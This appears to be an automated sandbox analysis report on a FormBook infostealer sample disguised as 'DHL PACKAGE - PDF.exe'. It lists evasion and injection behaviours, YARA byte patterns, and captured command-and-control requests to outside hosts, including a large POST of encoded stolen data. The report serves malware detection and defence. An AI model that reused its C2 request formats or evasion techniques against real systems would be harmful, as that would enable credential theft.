Play interactive tourEdit tour

# Analysis Report DHL PACKAGE - PDF.exe

## Overview

### General Information

 Sample Name: DHL PACKAGE - PDF.exe Analysis ID: 286161 MD5: 863bf0dfa1169706f566c070a1e11256 SHA1: 77175726680e40eeefdad0578a1d3377486d9fff SHA256: a102b644fd134778f28e1105e4645e84ff4d05687351990de90ae27a89f0513b Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64DHL PACKAGE - PDF.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe' MD5: 863BF0DFA1169706F566C070A1E11256)rundll32.exe (PID: 7016 cmdline: rundll32.exe SitulaCystocele,Hurley MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)autochk.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)NETSTAT.EXE (PID: 4912 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cmd.exe (PID: 7044 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x18339:$sqlite3step: 68 34 1C 7B E1
• 0x1844c:$sqlite3step: 68 34 1C 7B E1 • 0x18368:$sqlite3text: 68 38 2A 90 C5
• 0x1848d:$sqlite3text: 68 38 2A 90 C5 • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
• 0x184a3:$sqlite3blob: 68 53 D8 7F 8C 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 13 entries
SourceRuleDescriptionAuthorStrings
4.2.cmd.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
4.2.cmd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 4.2.cmd.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x18339:$sqlite3step: 68 34 1C 7B E1
• 0x1844c:$sqlite3step: 68 34 1C 7B E1 • 0x18368:$sqlite3text: 68 38 2A 90 C5
• 0x1848d:$sqlite3text: 68 38 2A 90 C5 • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
• 0x184a3:$sqlite3blob: 68 53 D8 7F 8C 4.2.cmd.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security 4.2.cmd.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 1 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: DHL PACKAGE - PDF.exe Avira: detected
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll Virustotal: Detection: 10% Perma Link Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll ReversingLabs: Detection: 16%
 Multi AV Scanner detection for submitted file Show sources
 Source: DHL PACKAGE - PDF.exe Virustotal: Detection: 49% Perma Link Source: DHL PACKAGE - PDF.exe ReversingLabs: Detection: 33%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: DHL PACKAGE - PDF.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 4.2.cmd.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Uses Microsoft's Enhanced Cryptographic Provider Show sources
 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E
 Contains functionality to query local drives Show sources
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop ebx 4_2_00407B00 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 4_2_0040E42D Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 4_2_00417C93 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 20_2_00DD7B00 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 20_2_00DE7C93 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 20_2_00DDE42D

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.4:49738
 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.shopendora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.3rdimultimedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 23.227.38.64 23.227.38.64 Source: Joe Sandbox View IP Address: 23.227.38.64 23.227.38.64 Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3 Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw). Source: global traffic HTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 188456Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 4d 38 75 56 4f 77 34 4b 48 31 4f 38 71 7e 6f 69 67 54 4c 67 52 7a 33 56 5f 6b 51 7a 4e 61 58 7a 41 7e 47 64 68 34 4e 78 79 62 42 55 4a 63 68 34 76 36 38 62 56 6b 78 28 46 71 33 47 44 4c 41 76 37 31 6a 5a 37 38 72 4c 75 36 54 45 77 4e 44 6b 79 52 72 6b 37 64 59 48 52 52 65 77 7a 44 61 53 6e 76 59 4e 66 68 70 5a 4c 71 36 4b 61 62 34 76 4e 67 51 6f 5a 38 67 68 5f 34 53 49 65 61 70 39 6e 73 67 67 79 55 63 77 44 4a 6e 77 39 35 73 4d 6b 43 72 62 72 30 74 6f 2d 5a 4d 61 6d 50 52 63 37 73 69 53 33 58 4f 45 76 6f 55 30 74 56 59 4f 78 5a 58 67 37 30 76 75 77 49 65 51 50 37 62 28 67 32 35 57 63 47 73 45 75 52 45 36 6e 4a 38 39 4b 72 79 46 57 4a 4a 44 31 56 42 4b 7a 67 43 75 4d 77 4f 4b 49 4e 72 47 31 50 32 63 73 56 6e 72 58 6d 4b 52 38 4b 49 62 37 73 66 48 50 48 45 54 4b 70 58 45 65 4d 52 78 2d 6c 70 68 79 7a 61 68 35 70 55 4b 6c 5a 50 76 50 33 54 79 52 59 66 6f 7a 63 44 49 72 6b 5f 79 47 6d 72 78 59 4a 64 52 33 63 76 4d 2d 78 39 70 74 65 6f 48 64 49 6c 73 74 6a 54 7e 4d 6c 74 41 64 65 5f 7a 4f 78 71 50 31 6d 61 30 75 45 71 79 61 73 45 4a 4a 38 57 74 37 63 7a 47 48 73 6b 77 43 53 48 6e 32 71 30 66 41 6e 6b 52 4c 50 2d 64 4e 48 58 71 77 43 6e 74 6a 30 44 6d 45 78 52 4e 50 74 61 6f 57 4b 70 50 7a 28 35 6d 70 78 4b 62 49 4a 49 55 51 77 44 28 6a 38 35 33 56 48 38 6e 62 6d 48 78 34 30 51 5a 62 33 55 4b 49 30 35 61 31 6a 54 38 78 57 64 4e 36 42 37 43 45 32 76 6a 4d 59 67 4e 6b 79 4f 48 4f 64 42 70 30 4c 61 55 6e 7e 56 4d 62 61 58 34 4e 76 69 32 64 46 64 75 4a 33 6d 32 47 46 6b 4f 4b 6c 41 78 73 67 74 53 6d 7a 67 77 7a 45 41 75 35 64 4c 68 48 38 61 28 45 39 30 45 55 31 6d 66 33 51 30 4f 31 79 5f 51 58 62 30 59 5a 67 43 6f 64 7e 57 36 37 49 33 76 62 7a 36 4c 75 67 43 7e 54 50 6b 61 48 28 6f 64 70 38 44 79 58 79 52 4f 72 65 75 4b 67 4e 70 74 2d 46 72 6a 64 34 36 78 48 53 2d 32 4d 41 74 68 61 4f 45 47 41 61 66 31 44 41 5a 38 36 6e 72 70 6a 5a 42 37 62 33 51 51 62 69 45 4d 55 31 39 50 63 32 6a 71 75 33 39 57 49 69 53 6b 71 65 6a 5a 4a 4a 41 50 41 72 79 75 44 70 7a 59 35 4e 6e 4e 54 44 59 50 75 4b 79 6f 5f 50 67 73 4a 44 53 64 61 64 75 73 31 4f 73 76 74 4b 61 66 37 43 4a 76 6a 36 4a 6b 6a 37 68 6f 49 75 45 56 4b 66 67 58 55 38 77 4f 77 35 30 33 75 46 35 36 45 4d 33 54 79 7a 34 37 58 65 45 54 57 47 47 39 6d 28 77 7e 4d 42 75 32 6c 58 58 68 7a 64 37 32 4e 39 72 6f 55 7a 4a 6d 58 48 49 70 4a 44 59 6a 66 67 59 49 4d 64 6f 69 31 38 42 6d 4e 33 4d 4a 77 34 6c 79 64 4c 70 75 75 44 65 32 42 71 33 6d 57 68 79 67 66 6a 43 6b 57 46 61 58 58 6e 75 67 37 66 62 52 70 67 43 4c 38 4b 36 6b 6e 56 39 32 53 6b 5a 77 4c 66 56 37 34 72 75 46 74 39 4d 32
 Source: global traffic HTTP traffic detected: GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.shopendora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1Host: www.3rdimultimedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.shopendora.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /c232/ HTTP/1.1Host: www.3rdimultimedia.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.3rdimultimedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3rdimultimedia.com/c232/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
 Urls found in memory or binary data Show sources
 Contains functionality for read data from the clipboard Show sources

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Contains functionality to shutdown / reboot the system Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
 Detected potential crypto function Show sources
